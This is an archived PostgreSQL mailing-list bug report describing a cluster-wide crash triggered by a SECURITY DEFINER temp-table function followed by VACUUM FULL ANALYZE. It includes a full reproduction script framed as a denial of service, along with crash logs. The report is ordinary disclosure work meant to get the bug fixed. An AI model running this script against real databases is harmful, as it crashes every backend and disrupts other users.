There exists a crash that could easily be used as a denial of service against PostgreSQL by any user who can call a trusted stored procedure that makes use of temp tables. This DoS does not exist without the use of a stored procedure (from what I can tell). The gist of it being:

CREATE DATABASE mydb WITH OWNER somedba;
\c mydb somedba
BEGIN;
-- Call a stored procedure that runs as SECURITY DEFINER, which creates a temp table
-- Add one or more rows of data to the table
COMMIT;
VACUUM FULL ANALYZE;


Where somedba is the owner of the mydb database, but does not have any abnormal privs (is just a user who happens to be a database owner). When somedba runs VACUUM FULL ANALYZE, I get the following error during the VACUUM which panics the entire cluster and causes all backends to shutdown:

[EMAIL PROTECTED]: [local] 22325 2004-10-03 10:51:15 PDT ERROR: relcache reference tmptbl is not owned by resource owner
@: 21502 2004-10-03 10:51:20 PDT LOG: server process (PID 22325) was terminated by signal 10
@: 21502 2004-10-03 10:51:20 PDT LOG: terminating any other active server processes
@: 21502 2004-10-03 10:51:20 PDT LOG: all server processes terminated; reinitializing
@: 22328 2004-10-03 10:51:21 PDT LOG: database system was interrupted at 2004-10-03 10:50:03 PDT
@: 22328 2004-10-03 10:51:21 PDT LOG: checkpoint record is at 0/4C42FC8
@: 22328 2004-10-03 10:51:21 PDT LOG: redo record is at 0/4C42FC8; undo record is at 0/0; shutdown FALSE
@: 22328 2004-10-03 10:51:21 PDT LOG: next transaction ID: 14034; next OID: 32678
@: 22328 2004-10-03 10:51:21 PDT LOG: database system was not properly shut down; automatic recovery in progress
@: 22328 2004-10-03 10:51:21 PDT LOG: redo starts at 0/4C43008
@: 22328 2004-10-03 10:51:21 PDT WARNING: could not remove database directory "/usr/local/pgsql/data/base/30827"
@: 22328 2004-10-03 10:51:24 PDT LOG: record with zero length at 0/57AA09C
@: 22328 2004-10-03 10:51:24 PDT LOG: redo done at 0/57AA070
@: 22328 2004-10-03 10:51:24 PDT LOG: database system is ready


I think this could be related to the bug I sent in a few days ago regarding new databases not having the owner properly set when creating a new database (ie, public is still owned by the owner of the template database, same with information_schema, etc).

Regardless, here's an SQL script that reproduces this fatal condition:

\c template1 realdba
DROP DATABASE testdb;
CREATE USER testdba ENCRYPTED PASSWORD 'pass' NOCREATEDB NOCREATEUSER;
CREATE DATABASE testdb WITH OWNER testdba;

\c testdb realdba
ALTER SCHEMA public OWNER TO testdba;

\c testdb testdba
CREATE FUNCTION plpgsql_call_handler()
RETURNS language_handler
AS '$libdir/plpgsql', 'plpgsql_call_handler'
LANGUAGE c;
CREATE TRUSTED LANGUAGE plpgsql HANDLER plpgsql_call_handler;
REVOKE ALL PRIVILEGES ON DATABASE testdb FROM PUBLIC CASCADE;
GRANT CREATE,TEMPORARY ON DATABASE testdb TO testdba;
REVOKE ALL PRIVILEGES ON SCHEMA public FROM PUBLIC CASCADE;
GRANT USAGE ON SCHEMA public TO PUBLIC;
BEGIN;
CREATE FUNCTION public.tmptbl_foo() RETURNS VOID AS 'BEGIN
PERFORM TRUE FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relname = \'tmptbl\'::TEXT AND c.relkind = \'r\'::TEXT AND pg_catalog.pg_table_is_visible(c.oid);
IF NOT FOUND THEN
EXECUTE \'CREATE LOCAL TEMP TABLE tmptbl (key TEXT) WITHOUT OIDS ON COMMIT DELETE ROWS;\';
ELSE
TRUNCATE TABLE tmptbl;
END IF;
RETURN;
END;' LANGUAGE 'plpgsql' SECURITY DEFINER;
GRANT EXECUTE ON FUNCTION public.tmptbl_foo() TO PUBLIC;
SELECT public.tmptbl_foo();
-- There has to be data in the TEMP TABLE otherwise the backend does not crash
INSERT INTO tmptbl VALUES ('goozfraba');
COMMIT;
VACUUM FULL ANALYZE;



The output: You are now connected to database "template1" as user "realdba". DROP DATABASE CREATE USER CREATE DATABASE You are now connected to database "testdb" as user "realdba". ALTER SCHEMA You are now connected to database "testdb" as user "testdba". CREATE FUNCTION CREATE LANGUAGE REVOKE GRANT REVOKE GRANT BEGIN CREATE FUNCTION GRANT tmptbl_foo ------------

(1 row)

COMMIT
psql:test.sql:36: server closed the connection unexpectedly
        This probably means the server terminated abnormally
        before or while processing the request.
psql:test.sql:36: connection to server was lost
Exit 2


And what a user sees on a different window: % psql somedb somedb=> BEGIN ; somedb=> INSERT INTO t1 (id) VALUES (1); somedb=> SELECT * from t1; id | i ----+--- 1 | (1 row)

-- Run the SQL script from above
somedb=> SELECT * from t1;
WARNING: terminating connection because of crash of another server process
DETAIL: The postmaster has commanded this server process to roll back the current transaction and exit, because another server process exited abnormally and possibly corrupted shared memory.
HINT: In a moment you should be able to reconnect to the database and repeat your command.
server closed the connection unexpectedly
This probably means the server terminated abnormally
before or while processing the request.
The connection to the server was lost. Attempting reset: Succeeded.
somedb=> SELECT * from t1;
id | i
----+---
(0 rows)




Happy happy joy joy. :-( I ran this test a dozen times, and periodically I'd get the following error message:

psql:test.sql:36: ERROR: relcache reference pg_toast_81859 is not owned by resource owner

instead of the crash, which leads me to believe that this could be related to bgwriter as it seems to be execution time dependent and bgwriter is the only component that I know of that could alter the ordering of events via its calls to msleep(). I'm also of the belief that pg_autovacuum seems to help mitigate this if I'm running this script right as pg_autovacuum. If I split the above VACUUM commands into two different VACUUM's:

VACUUM;
VACUUM FULL;

I get varying results:

COMMIT
psql:test.sql:36: ERROR: relcache reference tmptbl is not owned by resource owner TopTransaction
ANALYZE
psql:test.sql:37: ERROR: relcache reference pg_toast_122795 is not owned by resource owner TopTransaction


or sometimes:

psql:test.sql:36: ERROR:  "pg_toast_122805" is not an index
psql:test.sql:37: ERROR:  "pg_toast_122805" is not an index

or:

psql:test.sql:36: ERROR:  could not open relation with OID 245679
psql:test.sql:37: ERROR:  could not open relation with OID 245679

or:

psql:test.sql:36: ERROR: relcache reference pg_toast_204715 is not owned by resource owner TopTransaction
psql:test.sql:37: ERROR: relcache reference tmptbl is not owned by resource owner


and sometimes:

psql:test.sql:36: ERROR: relcache reference pg_class is not owned by resource owner TopTransaction
server closed the connection unexpectedly
This probably means the server terminated abnormally
before or while processing the request.
psql:test.sql:37: connection to server was lost


If I change things around so it's ANALYZE; VACUUM;, I can prod out a different error message:

ANALYZE
psql:test.sql:36: WARNING: you don't own a lock of type RowExclusiveLock
VACUUM
psql:test.sql:37: ERROR: relcache reference tmptbl is not owned by resource owner TopTransaction


and sometimes I just get:

psql:test.sql:36: WARNING:  you don't own a lock of type AccessShareLock
VACUUM
VACUUM

Both of them I can't get when doing VACUUMs alone. :-( That last error message is spooky because I don't know if the backend is in a stable state or not.... given the other error messages, I'm spooked.

:-/ So, with the wide range of error messages that come from the same script, I'm wondering if some memory isn't being trampled on, or the new subtransaction code and VACUUM/ANALYZE don't get along, or it's bgwriter somehow. *big shrug*

Regardless, I thought this would be of keen interest to many: hopefully a fix can be found before 8.0 is released. -sc

PS  I haven't tested to see if this bug exists in pre-8.X releases.

PPS Sorry for the barrage of bugs, I've been working offline for a few days now... now driving and found a hot spot along 101.

/me gives 3 cheers for unprotected access points!!!

--
Sean Chittenden


---------------------------(end of broadcast)--------------------------- TIP 3: if posting/reading through Usenet, please send an appropriate subscribe-nomail command to [EMAIL PROTECTED] so that your message can get through to the mailing list cleanly

Reply via email to